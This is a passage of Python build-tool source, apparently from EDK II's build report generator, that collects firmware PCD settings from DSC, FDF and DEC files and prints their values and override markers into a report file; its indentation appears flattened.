FileWrite(File, "UEFI Spec Version: %s" % self.UefiSpecVersion)
if self.PiSpecVersion:
FileWrite(File, "PI Spec Version: %s" % self.PiSpecVersion)
if self.PciDeviceId:
FileWrite(File, "PCI Device ID: %s" % self.PciDeviceId)
if self.PciVendorId:
FileWrite(File, "PCI Vendor ID: %s" % self.PciVendorId)
if self.PciClassCode:
FileWrite(File, "PCI Class Code: %s" % self.PciClassCode)
FileWrite(File, gSectionSep)
if "PCD" in ReportType:
GlobalPcdReport.GenerateReport(File, self.ModulePcdSet)
if "LIBRARY" in ReportType:
self.LibraryReport.GenerateReport(File)
if "DEPEX" in ReportType:
self.DepexReport.GenerateReport(File, GlobalDepexParser)
if "BUILD_FLAGS" in ReportType:
self.BuildFlagsReport.GenerateReport(File)
if "FIXED_ADDRESS" in ReportType and self.FileGuid:
GlobalPredictionReport.GenerateReport(File, self.FileGuid)
FileWrite(File, gSectionEnd)
def ReadMessage(From, To, ExitFlag):
while True:
# read one line a time
Line = From.readline()
# empty string means "end"
if Line is not None and Line != b"":
To(Line.rstrip().decode(encoding='utf-8', errors='ignore'))
else:
break
if ExitFlag.isSet():
break
##
# Reports platform and module PCD information
#
# This class reports the platform PCD section and module PCD subsection
# in the build report file.
#
class PcdReport(object):
##
# Constructor function for class PcdReport
#
# This constructor function generates PcdReport object a platform build.
# It collects the whole PCD database from platform DSC files, platform
# flash description file and package DEC files.
#
# @param self The object pointer
# @param Wa Workspace context information
#
def __init__(self, Wa):
self.AllPcds = {}
self.UnusedPcds = {}
self.ConditionalPcds = {}
self.MaxLen = 0
self.Arch = None
if Wa.FdfProfile:
self.FdfPcdSet = Wa.FdfProfile.PcdDict
else:
self.FdfPcdSet = {}
self.DefaultStoreSingle = True
self.SkuSingle = True
if GlobalData.gDefaultStores and len(GlobalData.gDefaultStores) > 1:
self.DefaultStoreSingle = False
if GlobalData.gSkuids and len(GlobalData.gSkuids) > 1:
self.SkuSingle = False
self.ModulePcdOverride = {}
for Pa in Wa.AutoGenObjectList:
self.Arch = Pa.Arch
#
# Collect all platform referenced PCDs and grouped them by PCD token space
# GUID C Names
#
for Pcd in Pa.AllPcdList:
PcdList = self.AllPcds.setdefault(Pcd.TokenSpaceGuidCName, {}).setdefault(Pcd.Type, [])
if Pcd not in PcdList:
PcdList.append(Pcd)
if len(Pcd.TokenCName) > self.MaxLen:
self.MaxLen = len(Pcd.TokenCName)
#
# Collect the PCD defined in DSC/FDF file, but not used in module
#
UnusedPcdFullList = []
for item in Pa.Platform.Pcds:
Pcd = Pa.Platform.Pcds[item]
if not Pcd.Type:
# check the Pcd in FDF file, whether it is used in module first
for T in PCD_TYPE_LIST:
PcdList = self.AllPcds.setdefault(Pcd.TokenSpaceGuidCName, {}).setdefault(T, [])
if Pcd in PcdList:
Pcd.Type = T
break
if not Pcd.Type:
PcdTypeFlag = False
for package in Pa.PackageList:
for T in PCD_TYPE_LIST:
if (Pcd.TokenCName, Pcd.TokenSpaceGuidCName, T) in package.Pcds:
Pcd.Type = T
PcdTypeFlag = True
if not Pcd.DatumType:
Pcd.DatumType = package.Pcds[(Pcd.TokenCName, Pcd.TokenSpaceGuidCName, T)].DatumType
break
if PcdTypeFlag:
break
if not Pcd.DatumType:
PcdType = Pcd.Type
# Try to remove Hii and Vpd suffix
if PcdType.startswith(TAB_PCDS_DYNAMIC_EX):
PcdType = TAB_PCDS_DYNAMIC_EX
elif PcdType.startswith(TAB_PCDS_DYNAMIC):
PcdType = TAB_PCDS_DYNAMIC
for package in Pa.PackageList:
if (Pcd.TokenCName, Pcd.TokenSpaceGuidCName, PcdType) in package.Pcds:
Pcd.DatumType = package.Pcds[(Pcd.TokenCName, Pcd.TokenSpaceGuidCName, PcdType)].DatumType
break
PcdList = self.AllPcds.setdefault(Pcd.TokenSpaceGuidCName, {}).setdefault(Pcd.Type, [])
UnusedPcdList = self.UnusedPcds.setdefault(Pcd.TokenSpaceGuidCName, {}).setdefault(Pcd.Type, [])
if Pcd in UnusedPcdList:
UnusedPcdList.remove(Pcd)
if Pcd not in PcdList and Pcd not in UnusedPcdFullList:
UnusedPcdFullList.append(Pcd)
if len(Pcd.TokenCName) > self.MaxLen:
self.MaxLen = len(Pcd.TokenCName)
if GlobalData.gConditionalPcds:
for PcdItem in GlobalData.gConditionalPcds:
if '.' in PcdItem:
(TokenSpaceGuidCName, TokenCName) = PcdItem.split('.')
if (TokenCName, TokenSpaceGuidCName) in Pa.Platform.Pcds:
Pcd = Pa.Platform.Pcds[(TokenCName, TokenSpaceGuidCName)]
PcdList = self.ConditionalPcds.setdefault(Pcd.TokenSpaceGuidCName, {}).setdefault(Pcd.Type, [])
if Pcd not in PcdList:
PcdList.append(Pcd)
UnusedPcdList = []
if UnusedPcdFullList:
for Pcd in UnusedPcdFullList:
if Pcd.TokenSpaceGuidCName + '.' + Pcd.TokenCName in GlobalData.gConditionalPcds:
continue
UnusedPcdList.append(Pcd)
for Pcd in UnusedPcdList:
PcdList = self.UnusedPcds.setdefault(Pcd.TokenSpaceGuidCName, {}).setdefault(Pcd.Type, [])
if Pcd not in PcdList:
PcdList.append(Pcd)
for Module in Pa.Platform.Modules.values():
#
# Collect module override PCDs
#
for ModulePcd in list(Module.M.ModulePcdList) + list(Module.M.LibraryPcdList):
TokenCName = ModulePcd.TokenCName
TokenSpaceGuid = ModulePcd.TokenSpaceGuidCName
ModuleDefault = ModulePcd.DefaultValue
ModulePath = os.path.basename(Module.M.MetaFile.File)
self.ModulePcdOverride.setdefault((TokenCName, TokenSpaceGuid), {})[ModulePath] = ModuleDefault
#
# Collect PCD DEC default value.
#
self.DecPcdDefault = {}
self._GuidDict = {}
for Pa in Wa.AutoGenObjectList:
for Package in Pa.PackageList:
Guids = Package.Guids
self._GuidDict.update(Guids)
for (TokenCName, TokenSpaceGuidCName, DecType) in Package.Pcds:
DecDefaultValue = Package.Pcds[TokenCName, TokenSpaceGuidCName, DecType].DefaultValue
self.DecPcdDefault.setdefault((TokenCName, TokenSpaceGuidCName, DecType), DecDefaultValue)
#
# Collect PCDs defined in DSC common section
#
self.DscPcdDefault = {}
for Pa in Wa.AutoGenObjectList:
for (TokenCName, TokenSpaceGuidCName) in Pa.Platform.Pcds:
DscDefaultValue = Pa.Platform.Pcds[(TokenCName, TokenSpaceGuidCName)].DscDefaultValue
if DscDefaultValue:
self.DscPcdDefault[(TokenCName, TokenSpaceGuidCName)] = DscDefaultValue
def GenerateReport(self, File, ModulePcdSet):
if not ModulePcdSet:
if self.ConditionalPcds:
self.GenerateReportDetail(File, ModulePcdSet, 1)
if self.UnusedPcds:
IsEmpty = True
for Token in self.UnusedPcds:
TokenDict = self.UnusedPcds[Token]
for Type in TokenDict:
if TokenDict[Type]:
IsEmpty = False
break
if not IsEmpty:
break
if not IsEmpty:
self.GenerateReportDetail(File, ModulePcdSet, 2)
self.GenerateReportDetail(File, ModulePcdSet)
##
# Generate report for PCD information
#
# This function generates report for separate module expression
# in a platform build.
#
# @param self The object pointer
# @param File The file object for report
# @param ModulePcdSet Set of all PCDs referenced by module or None for
# platform PCD report
# @param ReportySubType 0 means platform/module PCD report, 1 means Conditional
# directives section report, 2 means Unused Pcds section report
# @param DscOverridePcds Module DSC override PCDs set
#
def GenerateReportDetail(self, File, ModulePcdSet, ReportSubType = 0):
PcdDict = self.AllPcds
if ReportSubType == 1:
PcdDict = self.ConditionalPcds
elif ReportSubType == 2:
PcdDict = self.UnusedPcds
if not ModulePcdSet:
FileWrite(File, gSectionStart)
if ReportSubType == 1:
FileWrite(File, "Conditional Directives used by the build system")
elif ReportSubType == 2:
FileWrite(File, "PCDs not used by modules or in conditional directives")
else:
FileWrite(File, "Platform Configuration Database Report")
FileWrite(File, " *B - PCD override in the build option")
FileWrite(File, " *P - Platform scoped PCD override in DSC file")
FileWrite(File, " *F - Platform scoped PCD override in FDF file")
if not ReportSubType:
FileWrite(File, " *M - Module scoped PCD override")
FileWrite(File, gSectionSep)
else:
if not ReportSubType and ModulePcdSet:
#
# For module PCD sub-section
#
FileWrite(File, gSubSectionStart)
FileWrite(File, TAB_BRG_PCD)
FileWrite(File, gSubSectionSep)
AllPcdDict = {}
for Key in PcdDict:
AllPcdDict[Key] = {}
for Type in PcdDict[Key]:
for Pcd in PcdDict[Key][Type]:
AllPcdDict[Key][(Pcd.TokenCName, Type)] = Pcd
for Key in sorted(AllPcdDict):
#
# Group PCD by their token space GUID C Name
#
First = True
for PcdTokenCName, Type in sorted(AllPcdDict[Key]):
#
# Group PCD by their usage type
#
Pcd = AllPcdDict[Key][(PcdTokenCName, Type)]
TypeName, DecType = gPcdTypeMap.get(Type, ("", Type))
MixedPcdFlag = False
if GlobalData.MixedPcd:
for PcdKey in GlobalData.MixedPcd:
if (Pcd.TokenCName, Pcd.TokenSpaceGuidCName) in GlobalData.MixedPcd[PcdKey]:
PcdTokenCName = PcdKey[0]
MixedPcdFlag = True
if MixedPcdFlag and not ModulePcdSet:
continue
#
# Get PCD default value and their override relationship
#
DecDefaultValue = self.DecPcdDefault.get((Pcd.TokenCName, Pcd.TokenSpaceGuidCName, DecType))
DscDefaultValue = self.DscPcdDefault.get((Pcd.TokenCName, Pcd.TokenSpaceGuidCName))
DscDefaultValBak = DscDefaultValue
Field = ''
for (CName, Guid, Field) in self.FdfPcdSet:
if CName == PcdTokenCName and Guid == Key:
DscDefaultValue = self.FdfPcdSet[(CName, Guid, Field)]
break
if DscDefaultValue != DscDefaultValBak:
try:
DscDefaultValue = ValueExpressionEx(DscDefaultValue, Pcd.DatumType, self._GuidDict)(True)
except BadExpression as DscDefaultValue:
EdkLogger.error('BuildReport', FORMAT_INVALID, "PCD Value: %s, Type: %s" %(DscDefaultValue, Pcd.DatumType))
InfDefaultValue = None
PcdValue = DecDefaultValue
if DscDefaultValue:
PcdValue = DscDefaultValue
#The DefaultValue of StructurePcd already be the latest, no need to update.
if not self.IsStructurePcd(Pcd.TokenCName, Pcd.TokenSpaceGuidCName):
Pcd.DefaultValue = PcdValue
if ModulePcdSet is not None:
if (Pcd.TokenCName, Pcd.TokenSpaceGuidCName, Type) not in ModulePcdSet:
continue
InfDefaultValue, PcdValue = ModulePcdSet[Pcd.TokenCName, Pcd.TokenSpaceGuidCName, Type]
#The DefaultValue of StructurePcd already be the latest, no need to update.
if not self.IsStructurePcd(Pcd.TokenCName, Pcd.TokenSpaceGuidCName):
Pcd.DefaultValue = PcdValue
if InfDefaultValue:
try:
InfDefaultValue = ValueExpressionEx(InfDefaultValue, Pcd.DatumType, self._GuidDict)(True)
except BadExpression as InfDefaultValue:
EdkLogger.error('BuildReport', FORMAT_INVALID, "PCD Value: %s, Type: %s" % (InfDefaultValue, Pcd.DatumType))
if InfDefaultValue == "":
InfDefaultValue = None
BuildOptionMatch = False
if GlobalData.BuildOptionPcd:
for pcd in GlobalData.BuildOptionPcd:
if (Pcd.TokenSpaceGuidCName, Pcd.TokenCName) == (pcd[0], pcd[1]):
if pcd[2]:
continue
PcdValue = pcd[3]
#The DefaultValue of StructurePcd already be the latest, no need to update.
if not self.IsStructurePcd(Pcd.TokenCName, Pcd.TokenSpaceGuidCName):
Pcd.DefaultValue = PcdValue
BuildOptionMatch = True
break
if First:
if ModulePcdSet is None:
FileWrite(File, "")
FileWrite(File, Key)
First = False
if Pcd.DatumType in TAB_PCD_NUMERIC_TYPES:
try:
PcdValueNumber = int(PcdValue.strip(), 0)
except:
PcdValueNumber = int(PcdValue.lstrip('0'))
if DecDefaultValue is None:
DecMatch = True
else:
DecDefaultValueNumber = int(DecDefaultValue.strip(), 0)
DecMatch = (DecDefaultValueNumber == PcdValueNumber)
if InfDefaultValue is None:
InfMatch = True
else:
InfDefaultValueNumber = int(InfDefaultValue.strip(), 0)
InfMatch = (InfDefaultValueNumber == PcdValueNumber)
if DscDefaultValue is None:
DscMatch = True
else:
try:
DscDefaultValueNumber = int(DscDefaultValue.strip(), 0)
except:
DscDefaultValueNumber = int(DscDefaultValue.lstrip('0'))
DscMatch = (DscDefaultValueNumber == PcdValueNumber)
else:
if DecDefaultValue is None:
DecMatch = True
else:
DecMatch = (DecDefaultValue.strip() == PcdValue.strip())
if InfDefaultValue is None:
InfMatch = True
else:
InfMatch = (InfDefaultValue.strip() == PcdValue.strip())
if DscDefaultValue is None:
DscMatch = True
else:
DscMatch = (DscDefaultValue.strip() == PcdValue.strip())
IsStructure = False
if self.IsStructurePcd(Pcd.TokenCName, Pcd.TokenSpaceGuidCName):
IsStructure = True
if TypeName in ('DYNVPD', 'DEXVPD'):
SkuInfoList = Pcd.SkuInfoList
Pcd = GlobalData.gStructurePcd[self.Arch][(Pcd.TokenCName, Pcd.TokenSpaceGuidCName)]
Pcd.DatumType = Pcd.StructName
if TypeName in ('DYNVPD', 'DEXVPD'):
Pcd.SkuInfoList = SkuInfoList
if Pcd.PcdFieldValueFromComm:
BuildOptionMatch = True
DecMatch = False
elif Pcd.SkuOverrideValues:
DscOverride = False
if Pcd.DefaultFromDSC:
DscOverride = True
else:
DictLen = 0
for item in Pcd.SkuOverrideValues:
DictLen += len(Pcd.SkuOverrideValues[item])
if not DictLen:
DscOverride = False
else:
if not Pcd.SkuInfoList:
OverrideValues = Pcd.SkuOverrideValues
if OverrideValues:
Keys = list(OverrideValues.keys())
Data = OverrideValues[Keys[0]]
Struct = list(Data.values())
DscOverride = self.ParseStruct(Struct[0])
else:
SkuList = sorted(Pcd.SkuInfoList.keys())
for Sku in SkuList:
SkuInfo = Pcd.SkuInfoList[Sku]
if TypeName in ('DYNHII', 'DEXHII'):
if SkuInfo.DefaultStoreDict:
DefaultStoreList = sorted(SkuInfo.DefaultStoreDict.keys())
for DefaultStore in DefaultStoreList:
OverrideValues = Pcd.SkuOverrideValues[Sku]
DscOverride = self.ParseStruct(OverrideValues[DefaultStore])
if DscOverride:
break
else:
OverrideValues = Pcd.SkuOverrideValues[Sku]
if OverrideValues:
Keys = list(OverrideValues.keys())
OverrideFieldStruct = self.OverrideFieldValue(Pcd, OverrideValues[Keys[0]])
DscOverride = self.ParseStruct(OverrideFieldStruct)
if DscOverride:
break
if DscOverride:
DscDefaultValue = True
DscMatch = True
DecMatch = False
else:
DecMatch = True
else:
DscDefaultValue = True
DscMatch = True
DecMatch = False
#
# Report PCD item according to their override relationship
#
if Pcd.DatumType == 'BOOLEAN':
if DscDefaultValue:
DscDefaultValue = str(int(DscDefaultValue, 0))
if DecDefaultValue:
DecDefaultValue = str(int(DecDefaultValue, 0))
if InfDefaultValue:
InfDefaultValue = str(int(InfDefaultValue, 0))
if Pcd.DefaultValue:
Pcd.DefaultValue = str(int(Pcd.DefaultValue, 0))
if DecMatch:
self.PrintPcdValue(File, Pcd, PcdTokenCName, TypeName, IsStructure, DscMatch, DscDefaultValBak, InfMatch, InfDefaultValue, DecMatch, DecDefaultValue, ' ')
elif InfDefaultValue and InfMatch:
self.PrintPcdValue(File, Pcd, PcdTokenCName, TypeName, IsStructure, DscMatch, DscDefaultValBak, InfMatch, InfDefaultValue, DecMatch, DecDefaultValue, '*M')
elif BuildOptionMatch:
self.PrintPcdValue(File, Pcd, PcdTokenCName, TypeName, IsStructure, DscMatch, DscDefaultValBak, InfMatch, InfDefaultValue, DecMatch, DecDefaultValue, '*B')
else:
if DscDefaultValue and DscMatch:
if (Pcd.TokenCName, Key, Field) in self.FdfPcdSet:
self.PrintPcdValue(File, Pcd, PcdTokenCName, TypeName, IsStructure, DscMatch, DscDefaultValBak, InfMatch, InfDefaultValue, DecMatch, DecDefaultValue, '*F')
else:
self.PrintPcdValue(File, Pcd, PcdTokenCName, TypeName, IsStructure, DscMatch, DscDefaultValBak, InfMatch, InfDefaultValue, DecMatch, DecDefaultValue, '*P')
else:
self.PrintPcdValue(File, Pcd, PcdTokenCName, TypeName, IsStructure, DscMatch, DscDefaultValBak, InfMatch, InfDefaultValue, DecMatch, DecDefaultValue, '*M')
if ModulePcdSet is None:
if IsStructure:
continue
if not TypeName in ('PATCH', 'FLAG', 'FIXED'):
continue
if not BuildOptionMatch:
ModuleOverride = self.ModulePcdOverride.get((Pcd.TokenCName, Pcd.TokenSpaceGuidCName), {})
for ModulePath in ModuleOverride:
ModuleDefault = ModuleOverride[ModulePath]
if Pcd.DatumType in TAB_PCD_NUMERIC_TYPES:
try:
ModulePcdDefaultValueNumber = int(ModuleDefault.strip(), 0)
except:
ModulePcdDefaultValueNumber = int(ModuleDefault.lstrip('0'))
Match = (ModulePcdDefaultValueNumber == PcdValueNumber)
if Pcd.DatumType == 'BOOLEAN':
ModuleDefault = str(ModulePcdDefaultValueNumber)
else:
Match = (ModuleDefault.strip() == PcdValue.strip())
if Match:
continue
IsByteArray, ArrayList = ByteArrayForamt(ModuleDefault.strip())
if IsByteArray:
FileWrite(File, ' *M %-*s = %s' % (self.MaxLen + 15, ModulePath, '{'))
for Array in ArrayList:
FileWrite(File, Array)
else:
Value = ModuleDefault.strip()
if Pcd.DatumType in TAB_PCD_CLEAN_NUMERIC_TYPES:
if Value.startswith(('0x', '0X')):
Value = '{} ({:d})'.format(Value, int(Value, 0))
else:
Value = "0x{:X} ({})".format(int(Value, 0), Value)
FileWrite(File, ' *M %-*s = %s' % (self.MaxLen + 15, ModulePath, Value))
if ModulePcdSet is None:
FileWrite(File, gSectionEnd)
else:
if not ReportSubType and ModulePcdSet:
FileWrite(File, gSubSectionEnd)
def ParseStruct(self, struct):
HasDscOverride = False
if struct:
for _, Values in struct.items():
if Values[1] and Values[1].endswith('.dsc'):
HasDscOverride = True
break
return HasDscOverride
def PrintPcdDefault(self, File, Pcd, IsStructure, DscMatch, DscDefaultValue, InfMatch, InfDefaultValue, DecMatch, DecDefaultValue):
if not DscMatch and DscDefaultValue is not None:
Value = DscDefaultValue.strip()
IsByteArray, ArrayList = ByteArrayForamt(Value)
if IsByteArray:
FileWrite(File, ' %*s = %s' % (self.MaxLen + 19, 'DSC DEFAULT', "{"))
for Array in ArrayList:
FileWrite(File, Array)
else:
if Pcd.DatumType in TAB_PCD_CLEAN_NUMERIC_TYPES:
if Value.startswith(('0x', '0X')):
Value = '{} ({:d})'.format(Value, int(Value, 0))
else:
Value = "0x{:X} ({})".format(int(Value, 0), Value)
FileWrite(File, ' %*s = %s' % (self.MaxLen + 19, 'DSC DEFAULT', Value))
if not InfMatch and InfDefaultValue is not None:
Value = InfDefaultValue.strip()
IsByteArray, ArrayList = ByteArrayForamt(Value)
if IsByteArray:
FileWrite(File, ' %*s = %s' % (self.MaxLen + 19, 'INF DEFAULT', "{"))
for Array in ArrayList:
FileWrite(File, Array)
else:
if Pcd.DatumType in TAB_PCD_CLEAN_NUMERIC_TYPES:
if Value.startswith(('0x', '0X')):
Value = '{} ({:d})'.format(Value, int(Value, 0))
else:
Value = "0x{:X} ({})".format(int(Value, 0), Value)
FileWrite(File, ' %*s = %s' % (self.MaxLen + 19, 'INF DEFAULT', Value))
if not DecMatch and DecDefaultValue is not None:
Value = DecDefaultValue.strip()
IsByteArray, ArrayList = ByteArrayForamt(Value)
if IsByteArray:
FileWrite(File, ' %*s = %s' % (self.MaxLen + 19, 'DEC DEFAULT', "{"))
for Array in ArrayList:
FileWrite(File, Array)
else:
if Pcd.DatumType in TAB_PCD_CLEAN_NUMERIC_TYPES:
if Value.startswith(('0x', '0X')):
Value = '{} ({:d})'.format(Value, int(Value, 0))
else:
try:
Value = "0x{:X} ({})".format(int(Value, 0), Value)
except:
Value = "0x{:X} ({})".format(int(Value.lstrip('0')), Value)
FileWrite(File, ' %*s = %s' % (self.MaxLen + 19, 'DEC DEFAULT', Value))
if IsStructure:
self.PrintStructureInfo(File, Pcd.DefaultValues)
if DecMatch and IsStructure:
self.PrintStructureInfo(File, Pcd.DefaultValues)
def PrintPcdValue(self, File, Pcd, PcdTokenCName, TypeName, IsStructure, DscMatch, DscDefaultValue, InfMatch, InfDefaultValue, DecMatch, DecDefaultValue, Flag = ' '):
if not Pcd.SkuInfoList:
Value = Pcd.DefaultValue
IsByteArray, ArrayList = ByteArrayForamt(Value)
if IsByteArray:
FileWrite(File, ' %-*s : %6s %10s = %s' % (self.MaxLen, Flag + ' ' + PcdTokenCName, TypeName, '(' + Pcd.DatumType + ')', '{'))
for Array in ArrayList:
FileWrite(File, Array)
else:
if Pcd.DatumType in TAB_PCD_CLEAN_NUMERIC_TYPES:
if Value.startswith(('0x', '0X')):
Value = '{} ({:d})'.format(Value, int(Value, 0))
else:
Value = "0x{:X} ({})".format(int(Value, 0), Value)
FileWrite(File, ' %-*s : %6s %10s = %s' % (self.MaxLen, Flag + ' ' + PcdTokenCName, TypeName, '(' + Pcd.DatumType + ')', Value))
if IsStructure:
OverrideValues = Pcd.SkuOverrideValues
if OverrideValues:
Keys = list(OverrideValues.keys())
Data = OverrideValues[Keys[0]]
Struct = list(Data.values())
if Struct:
OverrideFieldStruct = self.OverrideFieldValue(Pcd, Struct[0])
self.PrintStructureInfo(File, OverrideFieldStruct)
self.PrintPcdDefault(File, Pcd, IsStructure, DscMatch, DscDefaultValue, InfMatch, InfDefaultValue, DecMatch, DecDefaultValue)
else:
FirstPrint = True
SkuList = sorted(Pcd.SkuInfoList.keys())
for Sku in SkuList:
SkuInfo = Pcd.SkuInfoList[Sku]
SkuIdName = SkuInfo.SkuIdName
if TypeName in ('DYNHII', 'DEXHII'):
if SkuInfo.DefaultStoreDict:
DefaultStoreList = sorted(SkuInfo.DefaultStoreDict.keys())
for DefaultStore in DefaultStoreList:
Value = SkuInfo.DefaultStoreDict[DefaultStore]
IsByteArray, ArrayList = ByteArrayForamt(Value)
if Pcd.DatumType == 'BOOLEAN':
Value = str(int(Value, 0))
if FirstPrint:
FirstPrint = False
if IsByteArray:
if self.DefaultStoreSingle and self.SkuSingle:
FileWrite(File, ' %-*s : %6s %10s = %s' % (self.MaxLen, Flag + ' ' + PcdTokenCName, TypeName, '(' + Pcd.DatumType + ')', '{'))
elif self.DefaultStoreSingle and not self.SkuSingle:
FileWrite(File, ' %-*s : %6s %10s %10s = %s' % (self.MaxLen, Flag + ' ' + PcdTokenCName, TypeName, '(' + Pcd.DatumType + ')', '(' + SkuIdName + ')', '{'))
elif not self.DefaultStoreSingle and self.SkuSingle:
FileWrite(File, ' %-*s : %6s %10s %10s = %s' % (self.MaxLen, Flag + ' ' + PcdTokenCName, TypeName, '(' + Pcd.DatumType + ')', '(' + DefaultStore + ')', '{'))
else:
FileWrite(File, ' %-*s : %6s %10s %10s %10s = %s' % (self.MaxLen, Flag + ' ' + PcdTokenCName, TypeName, '(' + Pcd.DatumType + ')', '(' + SkuIdName + ')', '(' + DefaultStore + ')', '{'))
for Array in ArrayList:
FileWrite(File, Array)
else:
if Pcd.DatumType in TAB_PCD_CLEAN_NUMERIC_TYPES:
if Value.startswith(('0x', '0X')):
Value = '{} ({:d})'.format(Value, int(Value, 0))
else:
Value = "0x{:X} ({})".format(int(Value, 0), Value)
if self.DefaultStoreSingle and self.SkuSingle:
FileWrite(File, ' %-*s : %6s %10s = %s' % (self.MaxLen, Flag + ' ' + PcdTokenCName, TypeName, '(' + Pcd.DatumType + ')', Value))
elif self.DefaultStoreSingle and not self.SkuSingle:
FileWrite(File, ' %-*s : %6s %10s %10s = %s' % (self.MaxLen, Flag + ' ' + PcdTokenCName, TypeName, '(' + Pcd.DatumType + ')', '(' + SkuIdName + ')', Value))
elif not self.DefaultStoreSingle and self.SkuSingle:
FileWrite(File, ' %-*s : %6s %10s %10s = %s' % (self.MaxLen, Flag + ' ' + PcdTokenCName, TypeName, '(' + Pcd.DatumType + ')', '(' + DefaultStore + ')', Value))
else:
FileWrite(File, ' %-*s : %6s %10s %10s %10s = %s' % (self.MaxLen, Flag + ' ' + PcdTokenCName, TypeName, '(' + Pcd.DatumType + ')', '(' + SkuIdName + ')', '(' + DefaultStore + ')', Value))
else:
if IsByteArray:
if self.DefaultStoreSingle and self.SkuSingle:
FileWrite(File, ' %-*s : %6s %10s = %s' % (self.MaxLen, ' ', TypeName, '(' + Pcd.DatumType + ')', '{'))
elif self.DefaultStoreSingle and not self.SkuSingle:
FileWrite(File, ' %-*s : %6s %10s %10s = %s' % (self.MaxLen, ' ', TypeName, '(' + Pcd.DatumType + ')', '(' + SkuIdName + ')', '{'))
elif not self.DefaultStoreSingle and self.SkuSingle:
FileWrite(File, ' %-*s : %6s %10s %10s = %s' % (self.MaxLen, ' ', TypeName, '(' + Pcd.DatumType + ')', '(' + DefaultStore + ')', '{'))
else:
FileWrite(File, ' %-*s : %6s %10s %10s %10s = %s' % (self.MaxLen, ' ', TypeName, '(' + Pcd.DatumType + ')', '(' + SkuIdName + ')', '(' + DefaultStore + ')', '{'))
for Array in ArrayList:
FileWrite(File, Array)
else:
if Pcd.DatumType in TAB_PCD_CLEAN_NUMERIC_TYPES:
if Value.startswith(('0x', '0X')):
Value = '{} ({:d})'.format(Value, int(Value, 0))
else:
Value = "0x{:X} ({})".format(int(Value, 0), Value)
if self.DefaultStoreSingle and self.SkuSingle:
FileWrite(File, ' %-*s : %6s %10s = %s' % (self.MaxLen, ' ', TypeName, '(' + Pcd.DatumType + ')', Value))
elif self.DefaultStoreSingle and not self.SkuSingle:
FileWrite(File, ' %-*s : %6s %10s %10s = %s' % (self.MaxLen, ' ', TypeName, '(' + Pcd.DatumType + ')', '(' + SkuIdName + ')', Value))
elif not self.DefaultStoreSingle and self.SkuSingle:
FileWrite(File, ' %-*s : %6s %10s %10s = %s' % (self.MaxLen, ' ', TypeName, '(' + Pcd.DatumType + ')', '(' + DefaultStore + ')', Value))
else:
FileWrite(File, ' %-*s : %6s %10s %10s %10s = %s' % (self.MaxLen, ' ', TypeName, '(' + Pcd.DatumType + ')', '(' + SkuIdName + ')', '(' + DefaultStore + ')', Value))
FileWrite(File, '%*s: %s: %s' % (self.MaxLen + 4, SkuInfo.VariableGuid, SkuInfo.VariableName, SkuInfo.VariableOffset))
if IsStructure:
OverrideValues = Pcd.SkuOverrideValues[Sku]
OverrideFieldStruct = self.OverrideFieldValue(Pcd, OverrideValues[DefaultStore])
self.PrintStructureInfo(File, OverrideFieldStruct)
self.PrintPcdDefault(File, Pcd, IsStructure, DscMatch, DscDefaultValue, InfMatch, InfDefaultValue, DecMatch, DecDefaultValue)
else:
Value = SkuInfo.DefaultValue
IsByteArray, ArrayList = ByteArrayForamt(Value)
if Pcd.DatumType == 'BOOLEAN':
Value = str(int(Value, 0))
if FirstPrint:
FirstPrint = False
if IsByteArray:
if self.SkuSingle:
FileWrite(File, ' %-*s : %6s %10s = %s' % (self.MaxLen, Flag + ' ' + PcdTokenCName, TypeName, '(' + Pcd.DatumType + ')', "{"))
else:
FileWrite(File, ' %-*s : %6s %10s %10s = %s' % (self.MaxLen, Flag + ' ' + PcdTokenCName, TypeName, '(' + Pcd.DatumType + ')', '(' + SkuIdName + ')', "{"))
for Array in ArrayList:
FileWrite(File, Array)
else:
if Pcd.DatumType in TAB_PCD_CLEAN_NUMERIC_TYPES:
if Value.startswith(('0x', '0X')):
Value = '{} ({:d})'.format(Value, int(Value, 0))
else:
Value = "0x{:X} ({})".format(int(Value, 0), Value)
if self.SkuSingle:
FileWrite(File, ' %-*s : %6s %10s = %s' % (self.MaxLen, Flag + ' ' + PcdTokenCName, TypeName, '(' + Pcd.DatumType + ')', Value))
else:
FileWrite(File, ' %-*s : %6s %10s %10s = %s' % (self.MaxLen, Flag + ' ' + PcdTokenCName, TypeName, '(' + Pcd.DatumType + ')', '(' + SkuIdName + ')', Value))
else:
if IsByteArray:
if self.SkuSingle:
FileWrite(File, ' %-*s : %6s %10s = %s' % (self.MaxLen, ' ', TypeName, '(' + Pcd.DatumType + ')', "{"))
else:
FileWrite(File, ' %-*s : %6s %10s %10s = %s' % (self.MaxLen, ' ', TypeName, '(' + Pcd.DatumType + ')', '(' + SkuIdName + ')', "{"))
for Array in ArrayList:
FileWrite(File, Array)
else:
if Pcd.DatumType in TAB_PCD_CLEAN_NUMERIC_TYPES:
if Value.startswith(('0x', '0X')):
Value = '{} ({:d})'.format(Value, int(Value, 0))
else:
Value = "0x{:X} ({})".format(int(Value, 0), Value)
if self.SkuSingle:
FileWrite(File, ' %-*s : %6s %10s = %s' % (self.MaxLen, ' ', TypeName, '(' + Pcd.DatumType + ')', Value))
else:
FileWrite(File, ' %-*s : %6s %10s %10s = %s' % (self.MaxLen, ' ', TypeName, '(' + Pcd.DatumType + ')', '(' + SkuIdName + ')', Value))
if TypeName in ('DYNVPD', 'DEXVPD'):
FileWrite(File, '%*s' % (self.MaxLen + 4, SkuInfo.VpdOffset))
if IsStructure:
OverrideValues = Pcd.SkuOverrideValues[Sku]
if OverrideValues:
Keys = list(OverrideValues.keys())
OverrideFieldStruct = self.OverrideFieldValue(Pcd, OverrideValues[Keys[0]])
self.PrintStructureInfo(File, OverrideFieldStruct)
self.PrintPcdDefault(File, Pcd, IsStructure, DscMatch, DscDefaultValue, InfMatch, InfDefaultValue, DecMatch, DecDefaultValue)
def OverrideFieldValue(self, Pcd, OverrideStruct):
OverrideFieldStruct = collections.OrderedDict()
if OverrideStruct:
for Key, Values in OverrideStruct.items():
if Values[1] and Values[1].endswith('.dsc'):
OverrideFieldStruct[Key] = Values
if Pcd.PcdFieldValueFromFdf:
for Key, Values in Pcd.PcdFieldValueFromFdf.items():
if Key in OverrideFieldStruct and Values[0] == OverrideFieldStruct[Key][0]:
continue
OverrideFieldStruct[Key] = Values
if Pcd.PcdFieldValueFromComm:
for Key, Values in Pcd.PcdFieldValueFromComm.items():
if Key in OverrideFieldStruct and Values[0] == OverrideFieldStruct[Key][0]:
continue
OverrideFieldStruct[Key] = Values
return OverrideFieldStruct
def PrintStructureInfo(self, File, Struct):
